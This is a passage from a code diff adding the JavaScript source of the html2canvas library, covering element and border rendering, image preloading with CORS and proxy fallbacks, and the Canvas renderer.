+              c1: [bx, by + bh + borders[2].width],
+              c2: [bx, by],
+              c3: [bx + bw, by + borders[0].width],
+              c4: [bx + bw, by + bh]
+            }, borderRadius[3], borderRadius[0],
+            borderPoints.bottomLeftOuter, borderPoints.bottomLeftInner, borderPoints.topLeftOuter, borderPoints.topLeftInner);
+            break;
+        }
+
+        borderData.borders.push({
+          args: borderArgs,
+          color: borders[borderSide].color
+        });
+
+      }
+    }
+
+    return borderData;
+  }
+
+  function createShape(ctx, args) {
+    var shape = ctx.drawShape();
+    args.forEach(function(border, index) {
+      shape[(index === 0) ? "moveTo" : border[0] + "To" ].apply(null, border.slice(1));
+    });
+    return shape;
+  }
+
+  function renderBorders(ctx, borderArgs, color) {
+    if (color !== "transparent") {
+      ctx.setVariable( "fillStyle", color);
+      createShape(ctx, borderArgs);
+      ctx.fill();
+      numDraws+=1;
+    }
+  }
+
+  function renderFormValue (el, bounds, stack){
+
+    var valueWrap = doc.createElement('valuewrap'),
+    cssPropertyArray = ['lineHeight','textAlign','fontFamily','color','fontSize','paddingLeft','paddingTop','width','height','border','borderLeftWidth','borderTopWidth'],
+    textValue,
+    textNode;
+
+    cssPropertyArray.forEach(function(property) {
+      try {
+        valueWrap.style[property] = getCSS(el, property);
+      } catch(e) {
+        // Older IE has issues with "border"
+        h2clog("html2canvas: Parse: Exception caught in renderFormValue: " + e.message);
+      }
+    });
+
+    valueWrap.style.borderColor = "black";
+    valueWrap.style.borderStyle = "solid";
+    valueWrap.style.display = "block";
+    valueWrap.style.position = "absolute";
+
+    if (/^(submit|reset|button|text|password)$/.test(el.type) || el.nodeName === "SELECT"){
+      valueWrap.style.lineHeight = getCSS(el, "height");
+    }
+
+    valueWrap.style.top = bounds.top + "px";
+    valueWrap.style.left = bounds.left + "px";
+
+    textValue = (el.nodeName === "SELECT") ? (el.options[el.selectedIndex] || 0).text : el.value;
+    if(!textValue) {
+      textValue = el.placeholder;
+    }
+
+    textNode = doc.createTextNode(textValue);
+
+    valueWrap.appendChild(textNode);
+    body.appendChild(valueWrap);
+
+    renderText(el, textNode, stack);
+    body.removeChild(valueWrap);
+  }
+
+  function drawImage (ctx) {
+    ctx.drawImage.apply(ctx, Array.prototype.slice.call(arguments, 1));
+    numDraws+=1;
+  }
+
+  function getPseudoElement(el, which) {
+    var elStyle = window.getComputedStyle(el, which);
+    if(!elStyle || !elStyle.content || elStyle.content === "none" || elStyle.content === "-moz-alt-content") {
+      return;
+    }
+    var content = elStyle.content + '',
+    first = content.substr( 0, 1 );
+    //strips quotes
+    if(first === content.substr( content.length - 1 ) && first.match(/'|"/)) {
+      content = content.substr( 1, content.length - 2 );
+    }
+
+    var isImage = content.substr( 0, 3 ) === 'url',
+    elps = document.createElement( isImage ? 'img' : 'span' );
+
+    elps.className = pseudoHide + "-before " + pseudoHide + "-after";
+
+    Object.keys(elStyle).filter(indexedProperty).forEach(function(prop) {
+      // Prevent assigning of read only CSS Rules, ex. length, parentRule
+      try {
+        elps.style[prop] = elStyle[prop];
+      } catch (e) {
+        h2clog(['Tried to assign readonly property ', prop, 'Error:', e]);
+      }
+    });
+
+    if(isImage) {
+      elps.src = _html2canvas.Util.parseBackgroundImage(content)[0].args[0];
+    } else {
+      elps.innerHTML = content;
+    }
+    return elps;
+  }
+
+  function indexedProperty(property) {
+    return (isNaN(window.parseInt(property, 10)));
+  }
+
+  function injectPseudoElements(el, stack) {
+    var before = getPseudoElement(el, ':before'),
+    after = getPseudoElement(el, ':after');
+    if(!before && !after) {
+      return;
+    }
+
+    if(before) {
+      el.className += " " + pseudoHide + "-before";
+      el.parentNode.insertBefore(before, el);
+      parseElement(before, stack, true);
+      el.parentNode.removeChild(before);
+      el.className = el.className.replace(pseudoHide + "-before", "").trim();
+    }
+
+    if (after) {
+      el.className += " " + pseudoHide + "-after";
+      el.appendChild(after);
+      parseElement(after, stack, true);
+      el.removeChild(after);
+      el.className = el.className.replace(pseudoHide + "-after", "").trim();
+    }
+
+  }
+
+  function renderBackgroundRepeat(ctx, image, backgroundPosition, bounds) {
+    var offsetX = Math.round(bounds.left + backgroundPosition.left),
+    offsetY = Math.round(bounds.top + backgroundPosition.top);
+
+    ctx.createPattern(image);
+    ctx.translate(offsetX, offsetY);
+    ctx.fill();
+    ctx.translate(-offsetX, -offsetY);
+  }
+
+  function backgroundRepeatShape(ctx, image, backgroundPosition, bounds, left, top, width, height) {
+    var args = [];
+    args.push(["line", Math.round(left), Math.round(top)]);
+    args.push(["line", Math.round(left + width), Math.round(top)]);
+    args.push(["line", Math.round(left + width), Math.round(height + top)]);
+    args.push(["line", Math.round(left), Math.round(height + top)]);
+    createShape(ctx, args);
+    ctx.save();
+    ctx.clip();
+    renderBackgroundRepeat(ctx, image, backgroundPosition, bounds);
+    ctx.restore();
+  }
+
+  function renderBackgroundColor(ctx, backgroundBounds, bgcolor) {
+    renderRect(
+      ctx,
+      backgroundBounds.left,
+      backgroundBounds.top,
+      backgroundBounds.width,
+      backgroundBounds.height,
+      bgcolor
+      );
+  }
+
+  function renderBackgroundRepeating(el, bounds, ctx, image, imageIndex) {
+    var backgroundSize = _html2canvas.Util.BackgroundSize(el, bounds, image, imageIndex),
+    backgroundPosition = _html2canvas.Util.BackgroundPosition(el, bounds, image, imageIndex, backgroundSize),
+    backgroundRepeat = getCSS(el, "backgroundRepeat").split(",").map(function(value) {
+      return value.trim();
+    });
+
+    image = resizeImage(image, backgroundSize);
+
+    backgroundRepeat = backgroundRepeat[imageIndex] || backgroundRepeat[0];
+
+    switch (backgroundRepeat) {
+      case "repeat-x":
+        backgroundRepeatShape(ctx, image, backgroundPosition, bounds,
+          bounds.left, bounds.top + backgroundPosition.top, 99999, image.height);
+        break;
+
+      case "repeat-y":
+        backgroundRepeatShape(ctx, image, backgroundPosition, bounds,
+          bounds.left + backgroundPosition.left, bounds.top, image.width, 99999);
+        break;
+
+      case "no-repeat":
+        backgroundRepeatShape(ctx, image, backgroundPosition, bounds,
+          bounds.left + backgroundPosition.left, bounds.top + backgroundPosition.top, image.width, image.height);
+        break;
+
+      default:
+        renderBackgroundRepeat(ctx, image, backgroundPosition, {
+          top: bounds.top,
+          left: bounds.left,
+          width: image.width,
+          height: image.height
+        });
+        break;
+    }
+  }
+
+  function renderBackgroundImage(element, bounds, ctx) {
+    var backgroundImage = getCSS(element, "backgroundImage"),
+    backgroundImages = _html2canvas.Util.parseBackgroundImage(backgroundImage),
+    image,
+    imageIndex = backgroundImages.length;
+
+    while(imageIndex--) {
+      backgroundImage = backgroundImages[imageIndex];
+
+      if (!backgroundImage.args || backgroundImage.args.length === 0) {
+        continue;
+      }
+
+      var key = backgroundImage.method === 'url' ?
+      backgroundImage.args[0] :
+      backgroundImage.value;
+
+      image = loadImage(key);
+
+      // TODO add support for background-origin
+      if (image) {
+        renderBackgroundRepeating(element, bounds, ctx, image, imageIndex);
+      } else {
+        h2clog("html2canvas: Error loading background:", backgroundImage);
+      }
+    }
+  }
+
+  function resizeImage(image, bounds) {
+    if(image.width === bounds.width && image.height === bounds.height) {
+      return image;
+    }
+
+    var ctx, canvas = doc.createElement('canvas');
+    canvas.width = bounds.width;
+    canvas.height = bounds.height;
+    ctx = canvas.getContext("2d");
+    drawImage(ctx, image, 0, 0, image.width, image.height, 0, 0, bounds.width, bounds.height );
+    return canvas;
+  }
+
+  function setOpacity(ctx, element, parentStack) {
+    var opacity = getCSS(element, "opacity") * ((parentStack) ? parentStack.opacity : 1);
+    ctx.setVariable("globalAlpha", opacity);
+    return opacity;
+  }
+
+  function createStack(element, parentStack, bounds) {
+
+    var ctx = h2cRenderContext((!parentStack) ? documentWidth() : bounds.width , (!parentStack) ? documentHeight() : bounds.height),
+    stack = {
+      ctx: ctx,
+      zIndex: setZ(getCSS(element, "zIndex"), (parentStack) ? parentStack.zIndex : null),
+      opacity: setOpacity(ctx, element, parentStack),
+      cssPosition: getCSS(element, "position"),
+      borders: getBorderData(element),
+      clip: (parentStack && parentStack.clip) ? _html2canvas.Util.Extend( {}, parentStack.clip ) : null
+    };
+
+    // TODO correct overflow for absolute content residing under a static position
+    if (options.useOverflow === true && /(hidden|scroll|auto)/.test(getCSS(element, "overflow")) === true && /(BODY)/i.test(element.nodeName) === false){
+      stack.clip = (stack.clip) ? clipBounds(stack.clip, bounds) : bounds;
+    }
+
+    stack.zIndex.children.push(stack);
+
+    return stack;
+  }
+
+  function getBackgroundBounds(borders, bounds, clip) {
+    var backgroundBounds = {
+      left: bounds.left + borders[3].width,
+      top: bounds.top + borders[0].width,
+      width: bounds.width - (borders[1].width + borders[3].width),
+      height: bounds.height - (borders[0].width + borders[2].width)
+    };
+
+    if (clip) {
+      backgroundBounds = clipBounds(backgroundBounds, clip);
+    }
+
+    return backgroundBounds;
+  }
+
+  function renderElement(element, parentStack, pseudoElement){
+    var bounds = _html2canvas.Util.Bounds(element),
+    image,
+    bgcolor = (ignoreElementsRegExp.test(element.nodeName)) ? "#efefef" : getCSS(element, "backgroundColor"),
+    stack = createStack(element, parentStack, bounds),
+    borders = stack.borders,
+    ctx = stack.ctx,
+    backgroundBounds = getBackgroundBounds(borders, bounds, stack.clip),
+    borderData = parseBorders(element, bounds, borders);
+
+    createShape(ctx, borderData.clip);
+
+    ctx.save();
+    ctx.clip();
+
+    if (backgroundBounds.height > 0 && backgroundBounds.width > 0){
+      renderBackgroundColor(ctx, bounds, bgcolor);
+      renderBackgroundImage(element, backgroundBounds, ctx);
+    }
+
+    ctx.restore();
+
+    borderData.borders.forEach(function(border) {
+      renderBorders(ctx, border.args, border.color);
+    });
+
+    if (!pseudoElement) {
+      injectPseudoElements(element, stack);
+    }
+
+    switch(element.nodeName){
+      case "IMG":
+        if ((image = loadImage(element.getAttribute('src')))) {
+          renderImage(ctx, element, image, bounds, borders);
+        } else {
+          h2clog("html2canvas: Error loading <img>:" + element.getAttribute('src'));
+        }
+        break;
+      case "INPUT":
+        // TODO add all relevant type's, i.e. HTML5 new stuff
+        // todo add support for placeholder attribute for browsers which support it
+        if (/^(text|url|email|submit|button|reset)$/.test(element.type) && (element.value || element.placeholder).length > 0){
+          renderFormValue(element, bounds, stack);
+        }
+        break;
+      case "TEXTAREA":
+        if ((element.value || element.placeholder || "").length > 0){
+          renderFormValue(element, bounds, stack);
+        }
+        break;
+      case "SELECT":
+        if ((element.options||element.placeholder || "").length > 0){
+          renderFormValue(element, bounds, stack);
+        }
+        break;
+      case "LI":
+        renderListItem(element, stack, backgroundBounds);
+        break;
+      case "CANVAS":
+        renderImage(ctx, element, element, bounds, borders);
+        break;
+    }
+
+    return stack;
+  }
+
+  function isElementVisible(element) {
+    return (getCSS(element, 'display') !== "none" && getCSS(element, 'visibility') !== "hidden" && !element.hasAttribute("data-html2canvas-ignore"));
+  }
+
+  function parseElement (el, stack, pseudoElement) {
+
+    if (isElementVisible(el)) {
+      stack = renderElement(el, stack, pseudoElement) || stack;
+      if (!ignoreElementsRegExp.test(el.nodeName)) {
+        _html2canvas.Util.Children(el).forEach(function(node) {
+          if (node.nodeType === 1) {
+            parseElement(node, stack, pseudoElement);
+          } else if (node.nodeType === 3) {
+            renderText(el, node, stack);
+          }
+        });
+      }
+    }
+  }
+
+  function svgDOMRender(body, stack) {
+    var img = new Image(),
+    docWidth = documentWidth(),
+    docHeight = documentHeight(),
+    html = "";
+
+    function parseDOM(el) {
+      var children = _html2canvas.Util.Children( el ),
+      len = children.length,
+      attr,
+      a,
+      alen,
+      elm,
+      i;
+      for ( i = 0; i < len; i+=1 ) {
+        elm = children[ i ];
+        if ( elm.nodeType === 3 ) {
+          // Text node
+          html += elm.nodeValue.replace(/</g,"&lt;").replace(/>/g,"&gt;");
+        } else if ( elm.nodeType === 1 ) {
+          // Element
+          if ( !/^(script|meta|title)$/.test(elm.nodeName.toLowerCase()) ) {
+
+            html += "<" + elm.nodeName.toLowerCase();
+
+            // add attributes
+            if ( elm.hasAttributes() ) {
+              attr = elm.attributes;
+              alen = attr.length;
+              for ( a = 0; a < alen; a+=1 ) {
+                html += " " + attr[ a ].name + '="' + attr[ a ].value + '"';
+              }
+            }
+
+
+            html += '>';
+
+            parseDOM( elm );
+
+
+            html += "</" + elm.nodeName.toLowerCase() + ">";
+          }
+        }
+
+      }
+
+    }
+
+    parseDOM(body);
+    img.src = [
+    "data:image/svg+xml,",
+    "<svg xmlns='http://www.w3.org/2000/svg' version='1.1' width='" + docWidth + "' height='" + docHeight + "'>",
+    "<foreignObject width='" + docWidth + "' height='" + docHeight + "'>",
+    "<html xmlns='http://www.w3.org/1999/xhtml' style='margin:0;'>",
+    html.replace(/\#/g,"%23"),
+    "</html>",
+    "</foreignObject>",
+    "</svg>"
+    ].join("");
+
+    img.onload = function() {
+      stack.svgRender = img;
+    };
+
+  }
+
+  function init() {
+    var stack = renderElement(element, null);
+
+    if (support.svgRendering) {
+      svgDOMRender(document.documentElement, stack);
+    }
+
+    Array.prototype.slice.call(element.children, 0).forEach(function(childElement) {
+      parseElement(childElement, stack);
+    });
+
+    stack.backgroundColor = getCSS(document.documentElement, "backgroundColor");
+    body.removeChild(hidePseudoElements);
+    return stack;
+  }
+
+  return init();
+};
+
+function h2czContext(zindex) {
+  return {
+    zindex: zindex,
+    children: []
+  };
+}
+_html2canvas.Preload = function( options ) {
+
+  var images = {
+    numLoaded: 0,   // also failed are counted here
+    numFailed: 0,
+    numTotal: 0,
+    cleanupDone: false
+  },
+  pageOrigin,
+  methods,
+  i,
+  count = 0,
+  element = options.elements[0] || document.body,
+  doc = element.ownerDocument,
+  domImages = doc.images, // TODO probably should limit it to images present in the element only
+  imgLen = domImages.length,
+  link = doc.createElement("a"),
+  supportCORS = (function( img ){
+    return (img.crossOrigin !== undefined);
+  })(new Image()),
+  timeoutTimer;
+
+  link.href = window.location.href;
+  pageOrigin  = link.protocol + link.host;
+
+  function isSameOrigin(url){
+    link.href = url;
+    link.href = link.href; // YES, BELIEVE IT OR NOT, that is required for IE9 - http://jsfiddle.net/niklasvh/2e48b/
+    var origin = link.protocol + link.host;
+    return (origin === pageOrigin);
+  }
+
+  function start(){
+    h2clog("html2canvas: start: images: " + images.numLoaded + " / " + images.numTotal + " (failed: " + images.numFailed + ")");
+    if (!images.firstRun && images.numLoaded >= images.numTotal){
+      h2clog("Finished loading images: # " + images.numTotal + " (failed: " + images.numFailed + ")");
+
+      if (typeof options.complete === "function"){
+        options.complete(images);
+      }
+
+    }
+  }
+
+  // TODO modify proxy to serve images with CORS enabled, where available
+  function proxyGetImage(url, img, imageObj){
+    var callback_name,
+    scriptUrl = options.proxy,
+    script;
+
+    link.href = url;
+    url = link.href; // work around for pages with base href="" set - WARNING: this may change the url
+
+    callback_name = 'html2canvas_' + (count++);
+    imageObj.callbackname = callback_name;
+
+    if (scriptUrl.indexOf("?") > -1) {
+      scriptUrl += "&";
+    } else {
+      scriptUrl += "?";
+    }
+    scriptUrl += 'url=' + encodeURIComponent(url) + '&callback=' + callback_name;
+    script = doc.createElement("script");
+
+    window[callback_name] = function(a){
+      if (a.substring(0,6) === "error:"){
+        imageObj.succeeded = false;
+        images.numLoaded++;
+        images.numFailed++;
+        start();
+      } else {
+        setImageLoadHandlers(img, imageObj);
+        img.src = a;
+      }
+      window[callback_name] = undefined; // to work with IE<9  // NOTE: that the undefined callback property-name still exists on the window object (for IE<9)
+      try {
+        delete window[callback_name];  // for all browser that support this
+      } catch(ex) {}
+      script.parentNode.removeChild(script);
+      script = null;
+      delete imageObj.script;
+      delete imageObj.callbackname;
+    };
+
+    script.setAttribute("type", "text/javascript");
+    script.setAttribute("src", scriptUrl);
+    imageObj.script = script;
+    window.document.body.appendChild(script);
+
+  }
+
+  function loadPseudoElement(element, type) {
+    var style = window.getComputedStyle(element, type),
+    content = style.content;
+    if (content.substr(0, 3) === 'url') {
+      methods.loadImage(_html2canvas.Util.parseBackgroundImage(content)[0].args[0]);
+    }
+    loadBackgroundImages(style.backgroundImage, element);
+  }
+
+  function loadPseudoElementImages(element) {
+    loadPseudoElement(element, ":before");
+    loadPseudoElement(element, ":after");
+  }
+
+  function loadGradientImage(backgroundImage, bounds) {
+    var img = _html2canvas.Generate.Gradient(backgroundImage, bounds);
+
+    if (img !== undefined){
+      images[backgroundImage] = {
+        img: img,
+        succeeded: true
+      };
+      images.numTotal++;
+      images.numLoaded++;
+      start();
+    }
+  }
+
+  function invalidBackgrounds(background_image) {
+    return (background_image && background_image.method && background_image.args && background_image.args.length > 0 );
+  }
+
+  function loadBackgroundImages(background_image, el) {
+    var bounds;
+
+    _html2canvas.Util.parseBackgroundImage(background_image).filter(invalidBackgrounds).forEach(function(background_image) {
+      if (background_image.method === 'url') {
+        methods.loadImage(background_image.args[0]);
+      } else if(background_image.method.match(/\-?gradient$/)) {
+        if(bounds === undefined) {
+          bounds = _html2canvas.Util.Bounds(el);
+        }
+        loadGradientImage(background_image.value, bounds);
+      }
+    });
+  }
+
+  function getImages (el) {
+    var elNodeType = false;
+
+    // Firefox fails with permission denied on pages with iframes
+    try {
+      _html2canvas.Util.Children(el).forEach(function(img) {
+        getImages(img);
+      });
+    }
+    catch( e ) {}
+
+    try {
+      elNodeType = el.nodeType;
+    } catch (ex) {
+      elNodeType = false;
+      h2clog("html2canvas: failed to access some element's nodeType - Exception: " + ex.message);
+    }
+
+    if (elNodeType === 1 || elNodeType === undefined) {
+      loadPseudoElementImages(el);
+      try {
+        loadBackgroundImages(_html2canvas.Util.getCSS(el, 'backgroundImage'), el);
+      } catch(e) {
+        h2clog("html2canvas: failed to get background-image - Exception: " + e.message);
+      }
+      loadBackgroundImages(el);
+    }
+  }
+
+  function setImageLoadHandlers(img, imageObj) {
+    img.onload = function() {
+      if ( imageObj.timer !== undefined ) {
+        // CORS succeeded
+        window.clearTimeout( imageObj.timer );
+      }
+
+      images.numLoaded++;
+      imageObj.succeeded = true;
+      img.onerror = img.onload = null;
+      start();
+    };
+    img.onerror = function() {
+      if (img.crossOrigin === "anonymous") {
+        // CORS failed
+        window.clearTimeout( imageObj.timer );
+
+        // let's try with proxy instead
+        if ( options.proxy ) {
+          var src = img.src;
+          img = new Image();
+          imageObj.img = img;
+          img.src = src;
+
+          proxyGetImage( img.src, img, imageObj );
+          return;
+        }
+      }
+
+      images.numLoaded++;
+      images.numFailed++;
+      imageObj.succeeded = false;
+      img.onerror = img.onload = null;
+      start();
+    };
+  }
+
+  methods = {
+    loadImage: function( src ) {
+      var img, imageObj;
+      if ( src && images[src] === undefined ) {
+        img = new Image();
+        if ( src.match(/data:image\/.*;base64,/i) ) {
+          img.src = src.replace(/url\(['"]{0,}|['"]{0,}\)$/ig, '');
+          imageObj = images[src] = {
+            img: img
+          };
+          images.numTotal++;
+          setImageLoadHandlers(img, imageObj);
+        } else if ( isSameOrigin( src ) || options.allowTaint ===  true ) {
+          imageObj = images[src] = {
+            img: img
+          };
+          images.numTotal++;
+          setImageLoadHandlers(img, imageObj);
+          img.src = src;
+        } else if ( supportCORS && !options.allowTaint && options.useCORS ) {
+          // attempt to load with CORS
+
+          img.crossOrigin = "anonymous";
+          imageObj = images[src] = {
+            img: img
+          };
+          images.numTotal++;
+          setImageLoadHandlers(img, imageObj);
+          img.src = src;
+
+          // work around for https://bugs.webkit.org/show_bug.cgi?id=80028
+          img.customComplete = function () {
+            if (!this.img.complete) {
+              this.timer = window.setTimeout(this.img.customComplete, 100);
+            } else {
+              this.img.onerror();
+            }
+          }.bind(imageObj);
+          img.customComplete();
+
+        } else if ( options.proxy ) {
+          imageObj = images[src] = {
+            img: img
+          };
+          images.numTotal++;
+          proxyGetImage( src, img, imageObj );
+        }
+      }
+
+    },
+    cleanupDOM: function(cause) {
+      var img, src;
+      if (!images.cleanupDone) {
+        if (cause && typeof cause === "string") {
+          h2clog("html2canvas: Cleanup because: " + cause);
+        } else {
+          h2clog("html2canvas: Cleanup after timeout: " + options.timeout + " ms.");
+        }
+
+        for (src in images) {
+          if (images.hasOwnProperty(src)) {
+            img = images[src];
+            if (typeof img === "object" && img.callbackname && img.succeeded === undefined) {
+              // cancel proxy image request
+              window[img.callbackname] = undefined; // to work with IE<9  // NOTE: that the undefined callback property-name still exists on the window object (for IE<9)
+              try {
+                delete window[img.callbackname];  // for all browser that support this
+              } catch(ex) {}
+              if (img.script && img.script.parentNode) {
+                img.script.setAttribute("src", "about:blank");  // try to cancel running request
+                img.script.parentNode.removeChild(img.script);
+              }
+              images.numLoaded++;
+              images.numFailed++;
+              h2clog("html2canvas: Cleaned up failed img: '" + src + "' Steps: " + images.numLoaded + " / " + images.numTotal);
+            }
+          }
+        }
+
+        // cancel any pending requests
+        if(window.stop !== undefined) {
+          window.stop();
+        } else if(document.execCommand !== undefined) {
+          document.execCommand("Stop", false);
+        }
+        if (document.close !== undefined) {
+          document.close();
+        }
+        images.cleanupDone = true;
+        if (!(cause && typeof cause === "string")) {
+          start();
+        }
+      }
+    },
+
+    renderingDone: function() {
+      if (timeoutTimer) {
+        window.clearTimeout(timeoutTimer);
+      }
+    }
+  };
+
+  if (options.timeout > 0) {
+    timeoutTimer = window.setTimeout(methods.cleanupDOM, options.timeout);
+  }
+
+  h2clog('html2canvas: Preload starts: finding background-images');
+  images.firstRun = true;
+
+  getImages(element);
+
+  h2clog('html2canvas: Preload: Finding images');
+  // load <img> images
+  for (i = 0; i < imgLen; i+=1){
+    methods.loadImage( domImages[i].getAttribute( "src" ) );
+  }
+
+  images.firstRun = false;
+  h2clog('html2canvas: Preload: Done.');
+  if ( images.numTotal === images.numLoaded ) {
+    start();
+  }
+
+  return methods;
+
+};
+_html2canvas.Renderer = function(parseQueue, options){
+
+  function createRenderQueue(parseQueue) {
+    var queue = [];
+
+    var sortZ = function(zStack){
+      var subStacks = [],
+      stackValues = [];
+
+      zStack.children.forEach(function(stackChild) {
+        if (stackChild.children && stackChild.children.length > 0){
+          subStacks.push(stackChild);
+          stackValues.push(stackChild.zindex);
+        } else {
+          queue.push(stackChild);
+        }
+      });
+
+      stackValues.sort(function(a, b) {
+        return a - b;
+      });
+
+      stackValues.forEach(function(zValue) {
+        var index;
+
+        subStacks.some(function(stack, i){
+          index = i;
+          return (stack.zindex === zValue);
+        });
+        sortZ(subStacks.splice(index, 1)[0]);
+
+      });
+    };
+
+    sortZ(parseQueue.zIndex);
+
+    return queue;
+  }
+
+  function getRenderer(rendererName) {
+    var renderer;
+
+    if (typeof options.renderer === "string" && _html2canvas.Renderer[rendererName] !== undefined) {
+      renderer = _html2canvas.Renderer[rendererName](options);
+    } else if (typeof rendererName === "function") {
+      renderer = rendererName(options);
+    } else {
+      throw new Error("Unknown renderer");
+    }
+
+    if ( typeof renderer !== "function" ) {
+      throw new Error("Invalid renderer defined");
+    }
+    return renderer;
+  }
+
+  return getRenderer(options.renderer)(parseQueue, options, document, createRenderQueue(parseQueue), _html2canvas);
+};
+
+_html2canvas.Util.Support = function (options, doc) {
+
+  function supportSVGRendering() {
+    var img = new Image(),
+    canvas = doc.createElement("canvas"),
+    ctx = (canvas.getContext === undefined) ? false : canvas.getContext("2d");
+    if (ctx === false) {
+      return false;
+    }
+    canvas.width = canvas.height = 10;
+    img.src = [
+    "data:image/svg+xml,",
+    "<svg xmlns='http://www.w3.org/2000/svg' width='10' height='10'>",
+    "<foreignObject width='10' height='10'>",
+    "<div xmlns='http://www.w3.org/1999/xhtml' style='width:10;height:10;'>",
+    "sup",
+    "</div>",
+    "</foreignObject>",
+    "</svg>"
+    ].join("");
+    try {
+      ctx.drawImage(img, 0, 0);
+      canvas.toDataURL();
+    } catch(e) {
+      return false;
+    }
+    h2clog('html2canvas: Parse: SVG powered rendering available');
+    return true;
+  }
+
+  // Test whether we can use ranges to measure bounding boxes
+  // Opera doesn't provide valid bounds.height/bottom even though it supports the method.
+
+  function supportRangeBounds() {
+    var r, testElement, rangeBounds, rangeHeight, support = false;
+
+    if (doc.createRange) {
+      r = doc.createRange();
+      if (r.getBoundingClientRect) {
+        testElement = doc.createElement('boundtest');
+        testElement.style.height = "123px";
+        testElement.style.display = "block";
+        doc.body.appendChild(testElement);
+
+        r.selectNode(testElement);
+        rangeBounds = r.getBoundingClientRect();
+        rangeHeight = rangeBounds.height;
+
+        if (rangeHeight === 123) {
+          support = true;
+        }
+        doc.body.removeChild(testElement);
+      }
+    }
+
+    return support;
+  }
+
+  return {
+    rangeBounds: supportRangeBounds(),
+    svgRendering: options.svgRendering && supportSVGRendering()
+  };
+};
+window.html2canvas = function(elements, opts) {
+  elements = (elements.length) ? elements : [elements];
+  var queue,
+  canvas,
+  options = {
+    // general
+    logging: false,
+    elements: elements,
+    background: "#fff",
+
+    // preload options
+    proxy: null,
+    timeout: 0,    // no timeout
+    useCORS: false, // try to load images as CORS (where available), before falling back to proxy
+    allowTaint: false, // whether to allow images to taint the canvas, won't need proxy if set to true
+
+    // parse options
+    svgRendering: false, // use svg powered rendering where available (FF11+)
+    ignoreElements: "IFRAME|OBJECT|PARAM",
+    useOverflow: true,
+    letterRendering: false,
+    chinese: false,
+
+    // render options
+
+    width: null,
+    height: null,
+    taintTest: true, // do a taint test with all images before applying to canvas
+    renderer: "Canvas"
+  };
+
+  options = _html2canvas.Util.Extend(opts, options);
+
+  _html2canvas.logging = options.logging;
+  options.complete = function( images ) {
+
+    if (typeof options.onpreloaded === "function") {
+      if ( options.onpreloaded( images ) === false ) {
+        return;
+      }
+    }
+    queue = _html2canvas.Parse( images, options );
+
+    if (typeof options.onparsed === "function") {
+      if ( options.onparsed( queue ) === false ) {
+        return;
+      }
+    }
+
+    canvas = _html2canvas.Renderer( queue, options );
+
+    if (typeof options.onrendered === "function") {
+      options.onrendered( canvas );
+    }
+
+
+  };
+
+  // for pages without images, we still want this to be async, i.e. return methods before executing
+  window.setTimeout( function(){
+    _html2canvas.Preload( options );
+  }, 0 );
+
+  return {
+    render: function( queue, opts ) {
+      return _html2canvas.Renderer( queue, _html2canvas.Util.Extend(opts, options) );
+    },
+    parse: function( images, opts ) {
+      return _html2canvas.Parse( images, _html2canvas.Util.Extend(opts, options) );
+    },
+    preload: function( opts ) {
+      return _html2canvas.Preload( _html2canvas.Util.Extend(opts, options) );
+    },
+    log: h2clog
+  };
+};
+
+window.html2canvas.log = h2clog; // for renderers
+window.html2canvas.Renderer = {
+  Canvas: undefined // We are assuming this will be used
+};
+_html2canvas.Renderer.Canvas = function(options) {
+
+  options = options || {};
+
+  var doc = document,
+  safeImages = [],
+  testCanvas = document.createElement("canvas"),
+  testctx = testCanvas.getContext("2d"),
+  canvas = options.canvas || doc.createElement('canvas');
+
+
+  function createShape(ctx, args) {
+    ctx.beginPath();
+    args.forEach(function(arg) {
+      ctx[arg.name].apply(ctx, arg['arguments']);
+    });
+    ctx.closePath();
+  }
+
+  function safeImage(item) {
+    if (safeImages.indexOf(item['arguments'][0].src ) === -1) {
+      testctx.drawImage(item['arguments'][0], 0, 0);
+      try {
+        testctx.getImageData(0, 0, 1, 1);
+      } catch(e) {
+        testCanvas = doc.createElement("canvas");
+        testctx = testCanvas.getContext("2d");
+        return false;
+      }
+      safeImages.push(item['arguments'][0].src);
+    }
+    return true;
+  }
+
+  function isTransparent(backgroundColor) {
+    return (backgroundColor === "transparent" || backgroundColor === "rgba(0, 0, 0, 0)");
+  }
+
+  function renderItem(ctx, item) {
+    switch(item.type){
+      case "variable":
+        ctx[item.name] = item['arguments'];
+        break;
+      case "function":
+        if (item.name === "createPattern") {
+          if (item['arguments'][0].width > 0 && item['arguments'][0].height > 0) {
+            try {
+              ctx.fillStyle = ctx.createPattern(item['arguments'][0], "repeat");
+            }
+            catch(e) {
+              h2clog("html2canvas: Renderer: Error creating pattern", e.message);
+            }
+          }
+        } else if (item.name === "drawShape") {
+          createShape(ctx, item['arguments']);
+        } else if (item.name === "drawImage") {
+          if (item['arguments'][8] > 0 && item['arguments'][7] > 0) {
+            if (!options.taintTest || (options.taintTest && safeImage(item))) {
+              ctx.drawImage.apply( ctx, item['arguments'] );
+            }
+          }
+        } else {
+          ctx[item.name].apply(ctx, item['arguments']);
+        }
+        break;
+    }
+  }
+
+  return function(zStack, options, doc, queue, _html2canvas) {
+
+    var ctx = canvas.getContext("2d"),
+    storageContext,
+    i,
+    queueLen,
+    newCanvas,
+    bounds,
+    fstyle;
+
+    canvas.width = canvas.style.width =  options.width || zStack.ctx.width;
+    canvas.height = canvas.style.height = options.height || zStack.ctx.height;
+
+    fstyle = ctx.fillStyle;
+    ctx.fillStyle = (isTransparent(zStack.backgroundColor) && options.background !== undefined) ? options.background : zStack.backgroundColor;
+    ctx.fillRect(0, 0, canvas.width, canvas.height);
+    ctx.fillStyle = fstyle;
+
+
+    if ( options.svgRendering && zStack.svgRender !== undefined ) {
+      // TODO: enable async rendering to support this
+      ctx.drawImage( zStack.svgRender, 0, 0 );
+    } else {
+      for ( i = 0, queueLen = queue.length; i < queueLen; i+=1 ) {
+        storageContext = queue.splice(0, 1)[0];
+        storageContext.canvasPosition = storageContext.canvasPosition || {};
+
+        // set common settings for canvas
+        ctx.textBaseline = "bottom";
+
+        if (storageContext.clip){
+          ctx.save();
+          ctx.beginPath();
+          // console.log(storageContext);
+          ctx.rect(storageContext.clip.left, storageContext.clip.top, storageContext.clip.width, storageContext.clip.height);
+          ctx.clip();
+        }
+
+        if (storageContext.ctx.storage) {
+          storageContext.ctx.storage.forEach(renderItem.bind(null, ctx));
+        }
+
+        if (storageContext.clip){
+          ctx.restore();
+        }
+      }
+    }
+
+    h2clog("html2canvas: Renderer: Canvas renderer done - returning canvas obj");
+
+    queueLen = options.elements.length;
+
+    if (queueLen === 1) {
+      if (typeof options.elements[0] === "object" && options.elements[0].nodeName !== "BODY") {
+        // crop image to the bounds of selected (single) element
